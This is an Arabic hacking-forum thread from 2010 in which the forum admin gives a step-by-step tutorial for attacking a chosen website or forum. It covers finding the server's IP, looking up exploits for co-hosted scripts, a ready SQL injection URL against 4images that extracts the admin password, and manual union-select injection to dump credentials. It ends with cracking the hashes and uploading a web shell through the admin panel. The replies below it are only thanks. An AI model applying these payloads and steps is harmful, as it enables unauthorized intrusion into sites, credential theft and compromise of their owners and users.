شباب ليبيا هدرازي
عزيزي الزائر / عزيزتي الزائرة يرجي التكرم بتسجبل الدخول اذا كنت عضو معنا
او التسجيل ان لم تكن عضو وترغب في الانضمام الي اسرة المنتدي
سنتشرف بتسجيلك
[b]شكرا


هكر نيم باز وبرامج اختراق و واكواد xml وهدا المنتدى حصرى وشامل
 
الرئيسيةform action="htس .و .جبحـثالأعضاءالتسجيلدخول
بحـث
 
 

نتائج البحث
 
Rechercher بحث متقدم
المواضيع الأخيرة
» منظومة أرقام ليبيانا
الجمعة مايو 05, 2017 10:33 pm من طرف boshra

» منضومة ليبيانا
الخميس نوفمبر 24, 2016 11:24 am من طرف menem

» كود آرسال آضافة بدون قبول المضاف :D
الأحد يناير 31, 2016 3:46 pm من طرف virus hkomy

» طريقة فتح الانترنت بالمجان خاص مستخدمي ليبيانا
السبت نوفمبر 07, 2015 7:02 pm من طرف malek201042

» طريقة لفتح المواقع المحجوبه داخل ليبيا
الأحد أغسطس 23, 2015 4:54 am من طرف ibrahematia

» منضومة المدار
الخميس يوليو 30, 2015 8:13 pm من طرف osama hesham

» ملاقط اكبارررر
الجمعة مايو 01, 2015 11:23 pm من طرف فرج النحيلى

» طريقة أيقاف الطرد الألي لغرف النيم بز + كود تعليق الايميل... جديدة وشغاله
الإثنين ديسمبر 15, 2014 4:06 am من طرف Tabtadarek

» برنامج النمبز الاخير 2012 + ميزات جديده
الإثنين ديسمبر 15, 2014 4:03 am من طرف Tabtadarek

ازرار التصفُّح
 البوابة
 الصفحة الرئيسية
 قائمة الاعضاء
 البيانات الشخصية
 س .و .ج
 ابحـث
منتدى
التبادل الاعلاني
احداث منتدى مجاني

شاطر | 
 

 اكتشاف ثغرات sql وتدكير بطرق استهداف موقع او منتدى

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل 
كاتب الموضوعرسالة
asd*ly
المـــدير العـــام
المـــدير العـــام
avatar

الجنس : ذكر عدد المساهمات : 190
نقاط : 6163
تاريخ التسجيل : 22/11/2009

مُساهمةموضوع: اكتشاف ثغرات sql وتدكير بطرق استهداف موقع او منتدى   الأحد أغسطس 22, 2010 9:09 am



اليوم حبيت اشرح للشباب كيفية اكتشاف واستغلال ثغرات الsql

بسم الله الرحمن الرحيم

نحن تعودنا انو لما نبي نستهدف منتدى او موقع يبقى نطلع الايبي تبعو ولاتقولي كيف نطلوه ؟؟

مافي مشكل الايبي نطلعوه بالشكل التالي نفتح الدوس

starبعدين نرووح ل run بعدين نكتب cmdبعدين تطلع شاشة الدوس نكتب
ping site.com

site.com طبعا هي الموقع المستهدف

وبعدين لما نطلع الايبي بنروووح نتابع الاستهداف ونبحث عن ثغرات للسكريبتات يلي

مركبها السيرفر اللي عليه الموقع او المنتدى المستهدف ولا تقول لي كيف نبحث عن
الثغرات ؟؟

مافي مشكل للبحث عن ثغرات السكريبتات نرووح اولا نطلع السكريبتات يلي مركبها السيرفر اللي عليه الموقع او المنتدى المستهدف بالطريقة التالية :

نرووح لموقعwww.msn.com

بعدين بمربع البحث نكتب كما يلي :


ip:125.20.04.13 powered

وطبعا نغير الاي بي الاي يلي استخرجناه قبل قليل

وبعدين تطلع سكريبتات كثييرة كمثال powered by 4images

4images هو نوع من انواع السكريبتات

ونجي لخطوة البحث عن ثغرات للسكريبت ودائما كمثال نأخد السكريبت 4images

ندهب الى موقع من مواقع السيكيرتي وكمثال نأخد الميليريوم http://www.milw0rm.com/search.php

نكتب في خانة البحث اسم السكريبت يلي راح نشوف له ثغرت وحنا اخدنا 4images

نكتب اسمو ونظغط بحث

بعدين بيطلع لك ثغرات استغلالاتها مختلفة وان شاء الله نتطرق لكافة الاستغلالات

كمثال استغلال ثغرة 4images يكون زي كده

search.php?search_user=x%2527%20union%20select%20u ser_password%20from%204images_users%20where%20user _name=%2527ADMIN

نكتب هالاستغلال خلف اسم السكريبت يعني زي كده

http://www.site.com/4images/search.p...ame=%2527ADMIN

وطبعا كلمة ADMIN نغيرها حسب اسم المدير

وبعدين راح يطلع لنا الباسوورد مشفر عادي نرووح نفكو ببرامج فك التشفير او مواقع فك التشفير كمثال نأخد http://www.milw0rm.com/cracker/

نحط الباسوورد المشفر وننتظر لحتى يفكو ولما يفكو ندخل اسم المدير والباسوورد ونضيف امتداد php من لوحة تحكم 4images

وبعدين نرفع شل عادي وكأننا نرفع في صورة

طيب لو ما لاقينا سكريبتات فيها ثغرات على السيرفر في هده الحالة نضطر الى اكتشاف الثغرات بنفسنا وفي هدا الدرس هوشرح لطريقة اكتشاف واستغلال ثغرات sql ولكننا انحرفنا عن درسنا قليلا ...... ما يهم

طريقة اكتشاف واستغلال ثغرات sql-injection

وهي ثغره مصابه بيها ما يقارب 60% من المواقع

وتسمى ثغره الحقن


اوكي كيف اعرفها او استغلها

طيب كيف نستخرج المواقع يلي فيها هده الثغرات

نستخرجها بالشكل التالي :

ندهب لwww.msn.com وبمربع البحث نكتب بالشكل التالي

ip:125.20.04.13 . warning
او
ip:125.20.04.13 . home
او
ip:125.20.04.13 . puplic_html
طبعا نغير الاي بي الى ايبي الي استخرجناه بالاول

خلي نفرض انك لقيت موقع على السيرفر الي تريده فيه اخطاء

والاخطاء تجي غالبا بالشكل التالي كمثال www.site.com/index.php?ver=21
نروح وندور على متغير اوكي والمتغير هو دالي ياتي بعدها علامه =
مثل www.site.com/index.php?ver=21

شفتو هذا متغير var=21


زين احنا وجدنا متغير كيف ابحث عن ثغرات اني اقولك
نضيف علامه " بعد المتغير ونشوف اذا ظهر لي في الصفحه خطأ
يعني كيف انا اقولك هكذا
www.seit.com/index.php?ver=21"

اشلون اعرف ظهر لي خطأ

يظهر في الصفحه هكذا

Warning: mysql_result(): supplied argument is not a valid MySQL result resource in

او في بعض الاحيان يضهر هكذا
You have an error in your SQL syntax. Check the manual that
corresponds to your MySQL server version for the
right syntax to use near ''' at line 1

اوكي احنا وجدنا خطا كيف اخترق الموقع
واي لازم نعرف عدد الاعمده المصابه
زين اشلون اني اقولك
نجي على الموقع
نضيف علامه - السالب قبل الرقم
www.seit.com/index.php?ver=-21

اوكي بعدها نكتب الامر
+union+select+

www.seit.com/index.php?ver=-21+union+select+


واحد ذكي يقلي ليش كتبنا هذا الكلام ؟؟ اقلك هذا امر اتصال بالقاعده اوكي نكمل

نشوف عدد الاعمده المصابه اوكي نكمل بعد علامه + نكتب
1,2,3,4,5,6,7,8,9,10

http://www.seit.com/index.php?ver=-2...+1,2,3,4,5,6,7

اوككي نبدي من رقم واحد ونزيد يعني نضيف عامود واحد ونضغط انتر نشوف هل ذهب الخطا
وبعدين رقم اثنين وهكذا نزيد في عدد الاعمده حتي يذهب الخطا

خلي نفرض انا وصلنا العمود السابع وذهب الخطا
http://www.seit.com/index.php?ver=-2...+1,2,3,4,5,6,7

يعني الخطا يلي شفناه اول مافتحنا الموقع يختفي ^^

نلا حض في مكان الخطا ضهرلنا رقم خلي نفرض ضهر لنا رقم 2

اوكي هذا هو المهم يعني في الاسغلال الي هو هذا
http://www.seit.com/index.php?ver=-2...+1,2,3,4,5,6,7
راح نضع اوامرنا مكان الرقم 2

اوكي حبايب طبعا احنا مهمتنا ندور على اسم الادمن والباسورد طيب كيف
اني اقلك تضع مكان الرقم 2 التالي

username( )

مثل

www.seit.com/index.php?ver=-21+union+select+1, username( ),3,4,5,6,7

راح تشوف مكان الرقم 2 الي ضهر في الصفحه يضهر لي اسم انشاء الله هو اسم الادمن
كذالك الباسورد نفس الطريقه بدل username( )

نحط password( )

وبعدين يطلع لنا الباسوورد مشفر ويبقى نفك تشفييييره ونخترق الموقع ونرفع شل من لوحة التحكم

طبعا الموضوع مكتوووب بالحرف بالحرف يعني ظروري راح تكون هنالك اخطاء املائية

وفي الاخير حبيت اقول ان

هدا الدرس هو اتمام للدروووس التي بدأتها من قبل وهو الدرس السادس اكتشاف ثغرات الsql
والدرس كان مشرروح بالفيديو وبطريقة جيدة ولكن حدف عن طريق الخطا ^^مو مشكل ان شاء الله لما بيكون وقت اعيد شرحو بالفيديو

بعرف انو الدرس صعيييييييب نوع ما او غير مفهوم لكن والله الوقت الكافي ماعندي وراح اعيد درووس بالفيديو ونفس هدا الدرس ان شاء الله راح اشرحو بالفيديو وكدالك راح نتطرق لاكتشاف واستغلال انواع الثغرات

وان شاء الله نبدأ بالدروووس الجديدة هده الأيام من بداية الاستهداف حتى تعليق الأندكس

اتمنى اكون وفيت وكفيت طبعا ما حبيت اتعمق اكثر في الدرس لأنو ماراح يساعد المبتدئين
الرجوع الى أعلى الصفحة اذهب الى الأسفل
فارس الاوهام
مشرف مبدع
مشرف مبدع
avatar

الجنس : ذكر عدد المساهمات : 27
نقاط : 5364
تاريخ التسجيل : 26/08/2010
العمر : 90

مُساهمةموضوع: رد: اكتشاف ثغرات sql وتدكير بطرق استهداف موقع او منتدى   الخميس أغسطس 26, 2010 2:21 pm

بالعكــــــــس خوي عبدالخالق مرزوق طريقه شرحك رائعه من ساهل جدا نفهموهااااااا يسلمو


الرجوع الى أعلى الصفحة اذهب الى الأسفل
*($~~!naruto!~~$)*
عضو نشيط
عضو نشيط
avatar

الجنس : ذكر عدد المساهمات : 46
نقاط : 5290
تاريخ التسجيل : 12/10/2010
العمر : 24

مُساهمةموضوع: رد: اكتشاف ثغرات sql وتدكير بطرق استهداف موقع او منتدى   الجمعة أكتوبر 15, 2010 7:14 am

شكرا على الشرح الرئـــــــــــــــع
موفق بأذن الله
الرجوع الى أعلى الصفحة اذهب الى الأسفل
شاعر الليل
عضو جديد
عضو جديد


الجنس : ذكر عدد المساهمات : 6
نقاط : 5184
تاريخ التسجيل : 10/11/2010
العمر : 32

مُساهمةموضوع: رد: اكتشاف ثغرات sql وتدكير بطرق استهداف موقع او منتدى   الأربعاء نوفمبر 10, 2010 3:22 pm

موفق ان شاء الله
الرجوع الى أعلى الصفحة اذهب الى الأسفل
ملك.المينا
عضو مميز
عضو مميز
avatar

الجنس : ذكر عدد المساهمات : 174
نقاط : 5468
تاريخ التسجيل : 06/10/2010
العمر : 32
الموقع : لأي استفسار اضافتي على mrdlesh@nimbuzz.com

مُساهمةموضوع: رد: اكتشاف ثغرات sql وتدكير بطرق استهداف موقع او منتدى   السبت نوفمبر 27, 2010 7:54 pm

مشكورر drunken
الرجوع الى أعلى الصفحة اذهب الى الأسفل
prince.alsahra
عضو نشيط
عضو نشيط
avatar

الجنس : ذكر عدد المساهمات : 31
نقاط : 5129
تاريخ التسجيل : 20/12/2010
العمر : 37

مُساهمةموضوع: رد: اكتشاف ثغرات sql وتدكير بطرق استهداف موقع او منتدى   الجمعة ديسمبر 24, 2010 7:40 pm

شكرررررااا
الرجوع الى أعلى الصفحة اذهب الى الأسفل
 
اكتشاف ثغرات sql وتدكير بطرق استهداف موقع او منتدى
استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
شباب ليبيا هدرازي :: قسم الهكر :: منتدى هكر عام فيه كل جديد الاختراق-
انتقل الى: